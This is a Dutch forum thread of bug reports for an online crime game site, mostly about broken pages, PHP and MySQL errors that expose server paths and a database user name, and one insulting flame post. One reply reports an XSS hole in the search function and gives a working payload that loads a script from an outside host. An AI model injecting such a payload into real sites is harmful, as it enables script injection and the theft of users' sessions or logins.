Bug topic #3

• En word er nog wat gedaan aan de andere bugs ?
    Het blijven miniscule updates, dus je al niet betrouwbare verdediging in voorafgaande discussies spreekt zichzelf nu tegen.

Koen, toppunt van zieligheid, ja dat heb je zelf begaan.
    Je komt er niet zomaar mee weg, je hoort nog van ons.
    Even a german had some form of respect for his enemy, even 65 years ago, this scumbag has none, making him the true evil.

• Mja, heb nog wel wat bugs te vermelden. Bij het zoeken zit een redelijke bug, XSS injecteren is mogelijk. Hoewel het alleen via POST te doen is, is het alsnog iets om naar te kijken..

\"><script src=http://hackclub.nl/xss.js></script>

• Ik had net gereageerd op het topic van "Show je bureau" maar werd naar een ander topic verwezen na een reactie.

PostCounter: 0 - 100 - 200 - 300 - 400 - 500 - 600 - 700 - 800 - 900 - 1000

Project vendettagame.com:
    10% klaar

• Waar: Highlights
    Bug:

PHP
    SQLSTATE[HY000] [2003] Can't connect to MySQL server on '127.0.0.1' (111)
    Highlights
    Op deze pagina vind je een geschiedenis van de highlights die op CP zijn geweest. Alle topic's die de crew heeft aangewezen als highlight vind je dus hier!

Fatal error: Call to a member function query() on a non-object in /home/criminalsp/domains/criminalspoint.com/public_html/highlights.php on line 187

Uitleg: als je op de link meer highlights klikt komt dat er ste staan.

Basskiller

• Waar: Priv? berichten
    Bug: Kan PB niet openen
    Uitleg: Ik had een PB gehad van Lodewijk en Chrome gaf deze fout:
    Fout 324 (net::ERR_EMPTY_RESPONSE): Onbekende fout
    Lodewijk weet de bug, maar het is maar 1 bericht die ik niet kan openen de rest wel. Ik weet niet of meer mensen dit al gehad hebben.

Heb het ook geprobeerd in IE en FF en daar geeft die een witte pagina.

• Waar: Overal op cp
    Bug: Alle pagina's staan onder te menu's
    Uitleg: Als je op een pagina komt dan moet je helemaal naar benede scrollen naar de laatste menu om de content te zien, ( Altans in IE 8 ) Misschien dat het op andere explores niet ziet.

MVG Georgo

• Waar: Ergens
    Bug: Informatie
    Uitleg: Geen, zoek maar

Warning: mysql_query() [function.mysql-query]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/criminalsp/domains/criminalspoint.com/public_html/*********.php on line 12

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/criminalsp/domains/criminalspoint.com/public_html/*********.php on line 12
    Access denied for user 'apache'@'localhost' (using password: NO)

PostCounter: 0 - 100 - 200 - 300 - 400 - 500 - 600 - 700 - 800 - 900 - 1000

Project vendettagame.com:
    10% klaar

• Waar: Control Panel » Avatar wijzigen
    Bug: Uw afbeelding is te groot.
    Uitleg: Ik kan mijn avatar niet wijzigen: er staat altijd dat hij te groot is, terwijl ik hem zelf in Photoshop heb opgeslagen als 50px*50px en hij amper 9kB groot is...

[offtopic]Mijn broer had die bug enkele maanden geleden ook al, maar ik heb me er nooit veel van aangetrokken...[/offtopic]

• Dit komt door de server tijd perry,

CP kan hier weinig aan doen tenzij alleen contact op nemen met hun hoster of ze moeten zelf een server beschikken.

Groetjes

This is ten percent luck, twenty percent skill
    Fifteen percent concentrated power of will
    Five percent pleasure, fifty percent pain
    And a hundred percent reason to remember the name!

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!